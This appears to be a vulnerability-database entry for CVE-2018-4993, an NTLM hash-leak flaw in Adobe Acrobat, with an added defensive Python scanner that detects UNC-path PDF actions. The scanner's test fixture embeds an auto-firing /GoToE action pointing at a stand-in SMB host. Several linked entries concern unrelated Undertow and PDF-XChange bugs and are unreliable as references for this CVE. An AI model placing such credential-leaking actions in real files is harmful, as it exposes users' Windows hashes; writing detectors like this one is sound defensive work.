Public exploit available
Public proof-of-concept or exploit code exists (ExploitDB / Metasploit / Nuclei).

CVE-2018-4993: Sensitive Information Exposure in Adobe Acrobat DC

Severity: 7.5 HIGH (NVD)
Other scores: NVD 6.5 | GHSA 6.1
EPSS: 68.3% (top 1.39%)
CISA KEV: Not in KEV
Exploit: PoC available (public exploit / PoC exists)
Timeline: Published Jul 9 | Latest update May 24

Description

Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have an NTLM SSO hash theft vulnerability. Successful exploitation could lead to information disclosure.
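The description above says only "NTLM SSO hash theft". The publicly documented mechanism for this bug class is a PDF action (/GoToE, /GoToR or /Launch) whose file specification is a UNC path: when the action fires, the reader resolves that path over SMB and Windows single sign-on answers the server's challenge with the user's NTLMv2 response, which the attacker's host records. The scanner below is an added example, not code from this page, from Adobe or from the Metasploit module listed further down. It walks the raw PDF syntax, decodes PDF literal and hex strings, and reports actions whose file spec points at a UNC-style location. The sample document, the documentation address 198.51.100.7 and the treatment of a leading "//" as remote are constructed for the example.

```python
import re

# Action types whose file specification the reader resolves when the action fires.
ACTION_RE = re.compile(rb'/S\s*/(GoToE|GoToR|Launch)\b')
_ESCAPES = {b'n': b'\n', b'r': b'\r', b't': b'\t', b'b': b'\b', b'f': b'\f',
            b'(': b'(', b')': b')', b'\\': b'\\'}

# Constructed test input: a skeletal PDF whose /OpenAction is a /GoToE pointing at a
# UNC path on the documentation address 198.51.100.7. Object 5 is a benign local
# /GoToR for contrast. It is a scanner fixture, not a working exploit document.
SAMPLE_PDF = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /S /GoToE /D [0 /Fit] /F << /Type /Filespec /F (\\\\\\\\198.51.100.7\\\\share\\\\x.pdf) >> >> endobj
5 0 obj << /S /GoToR /D [0 /Fit] /F (local.pdf) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""


def _read_literal(data, i):
    """Decode the PDF literal string starting at data[i] == b'('; return (bytes, next index)."""
    depth, out, i = 1, bytearray(), i + 1
    while i < len(data) and depth:
        c = data[i:i + 1]
        if c == b'\\':
            nxt = data[i + 1:i + 2]
            if nxt in _ESCAPES:
                out += _ESCAPES[nxt]; i += 2
            elif nxt and nxt in b'01234567':          # \ddd octal escape, up to 3 digits
                j = i + 1
                while j < len(data) and j < i + 4 and data[j:j + 1] in b'01234567':
                    j += 1
                out.append(int(data[i + 1:j], 8) & 0xFF); i = j
            elif nxt in (b'\r', b'\n'):               # backslash-newline is a line continuation
                i += 2 + (nxt == b'\r' and data[i + 2:i + 3] == b'\n')
            else:                                     # unknown escape: the backslash is dropped
                out += nxt; i += 2
        elif c == b'(':
            depth += 1; out += c; i += 1
        elif c == b')':
            depth -= 1
            if depth:
                out += c
            i += 1
        else:
            out += c; i += 1
    return bytes(out), i


def _read_hex(data, i):
    """Decode the PDF hex string starting at data[i] == b'<'; return (bytes, next index)."""
    end = data.find(b'>', i + 1)
    end = len(data) if end < 0 else end
    digits = re.sub(rb'\s+', b'', data[i + 1:end])
    if len(digits) % 2:
        digits += b'0'                                # an odd trailing digit reads as if followed by 0
    try:
        return bytes.fromhex(digits.decode('ascii')), end + 1
    except ValueError:
        return b'', end + 1


def _tokens(data):
    """Yield ('<<', offset), ('>>', offset) and ('str', decoded_bytes); skip comments and other syntax.
    Stream bodies are not inflated, so actions hidden in FlateDecode or object streams are missed."""
    i, n = 0, len(data)
    while i < n:
        two, c = data[i:i + 2], data[i:i + 1]
        if two == b'<<' or two == b'>>':
            yield two.decode(), i; i += 2
        elif c == b'(':
            s, i = _read_literal(data, i); yield 'str', s
        elif c == b'<':
            s, i = _read_hex(data, i); yield 'str', s
        elif c == b'%':
            nl = data.find(b'\n', i); i = n if nl < 0 else nl + 1
        else:
            i += 1


def iter_dicts(data):
    """Yield (start, end) byte offsets of every << ... >> dictionary, innermost first."""
    stack = []
    for kind, val in _tokens(data):
        if kind == '<<':
            stack.append(val)
        elif kind == '>>' and stack:
            yield stack.pop(), val + 2


def strings_in(body):
    return [val for kind, val in _tokens(body) if kind == 'str']


def looks_remote(path):
    # \\server\share is a UNC path; a leading // is the forward-slash spelling of the
    # same kind of location and is flagged too (an assumption of this example, review by hand).
    p = path.lstrip()
    return p.startswith(b'\\\\') or p.startswith(b'//')


def find_unc_actions(pdf):
    """Return [(action_type, decoded_path)] for actions whose file spec looks remote."""
    hits = []
    for start, end in iter_dicts(pdf):
        body = pdf[start:end]
        m = ACTION_RE.search(body)
        if not m:
            continue
        for s in strings_in(body):
            if looks_remote(s):
                hit = (m.group(1).decode('ascii'), s.decode('latin-1'))
                if hit not in hits:                   # nested action chains would otherwise repeat
                    hits.append(hit)
    return hits


if __name__ == '__main__':
    for kind, path in find_unc_actions(SAMPLE_PDF):
        print(f'{kind} action -> remote file spec {path!r}')
```

Run against a suspect file with `find_unc_actions(open(f, 'rb').read())`. Because the scanner never inflates streams, treat a clean result on a compressed document as inconclusive and follow up with a full PDF parser. The durable control is at the network edge rather than in the reader: block outbound TCP 445 and other NTLM-capable egress from user subnets, since the Adobe fix for this CVE was later bypassed (see the Tenable item on CVE-2018-15979 under Threat Intelligence below).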

CVSS vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (Exploitability: 3.9 | Impact: 3.6)

Affected Packages (3 packages)

Source  Package                    From          To
NVD     adobe/acrobat_reader_dc    15.006.30060  15.006.30417  (+2 more ranges)
NVD     adobe/acrobat_dc           15.006.30060  15.006.30417  (+2 more ranges)

Patches

🔴 Vulnerability Details (3)

GHSA: GHSA-2pj4-mr9m-qwww: Tracker PDF-XChange Editor before 8 (2022-05-24)
GHSA: GHSA-4rxx-6c3r-g2p4: Adobe Acrobat and Reader versions 2018 (2022-05-14)
GHSA: Improper Neutralization of CRLF Sequences in HTTP Headers in Undertow (2022-05-13)

💥 Exploits & PoCs (1)

Metasploit: BADPDF Malicious PDF Creator

📋 Vendor Advisories (1)

Red Hat: undertow: HTTP header injection using CRLF with UTF-8 Encoding (incomplete fix of CVE-2016-4993) (2018-04-25)

🕵️ Threat Intelligence (4)

SentinelOne: Malicious PDFs | Revealing the Techniques Behind the Attacks (2019-03-27)
Tenable: Adobe Patches Incomplete Fix for NTLM Credential Leaking Bug (CVE-2018-15979) (2018-11-14)
Zscaler: Zscaler protects against 38 new vulnerabilities for Adobe Fl

💬 Community (2)

Bugzilla: CVE-2018-1067 wildfly: undertow: HTTP header injection using CRLF with UTF-8 Encoding (incomplete fix of CVE-2016-4993) [fedora-all] (2018-06-19)
Bugzilla: CVE-2018-1067 undertow: HTTP header injection using CRLF with UTF-8 Encoding (incomplete fix of CVE-2016-4993) (2018-03-01)